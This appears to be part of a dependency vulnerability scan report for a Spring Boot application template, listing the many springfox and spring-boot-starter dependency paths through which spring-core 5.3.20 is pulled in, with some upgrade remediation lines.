  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
